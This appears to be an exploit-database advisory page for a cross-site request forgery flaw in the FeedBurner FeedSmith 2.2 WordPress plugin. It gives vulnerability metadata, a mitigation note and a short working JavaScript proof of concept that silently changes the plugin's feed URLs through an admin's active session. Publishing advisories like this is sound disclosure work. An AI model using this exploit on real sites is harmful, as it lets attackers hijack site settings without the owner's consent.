header-logo
Suggest Exploit
vendor:
FeedSmith
by:
Unknown
5.5
CVSS
MEDIUM
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: FeedSmith
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: NO
Related CWE:
CPE: a:feedburner:feedsmith:2.2
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Cross-Site Request Forgery in FeedBurner FeedSmith

The FeedBurner FeedSmith plugin is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to use a victim's currently active session to perform actions with the application. The vulnerability can be exploited by sending a malicious request to the affected application.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of the FeedBurner FeedSmith plugin or remove the plugin if it is not necessary.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25921/info

FeedBurner FeedSmith is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to use a victim's currently active session to perform actions with the application.

This issue affects FeedBurner FeedSmith 2.2; other versions may also be affected. 

// Simple Proof of Concept Exploit for FeedSmith Feedburner CSRF Hijacking
// Tested on version 2.2.

t='http://www.example.com/wordpress/wp-admin/options-general.php?
    page=FeedBurner_FeedSmith_Plugin.php';

p='redirect=true&feedburner_url=http://www.example2.com/with/new/feed&
    feedburner_comments_url=http://www.example3.com/with/new/feed';

feedburner_csrf = function(t, p) {

        req = new XMLHttpRequest();
        var url = t;
        var params = p;
        req.open("POST", url);

        req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        req.setRequestHeader("Content-length", params.length);
        req.setRequestHeader("Connection", "close");
        req.send(params);

};

feedburner_csrf(t,p);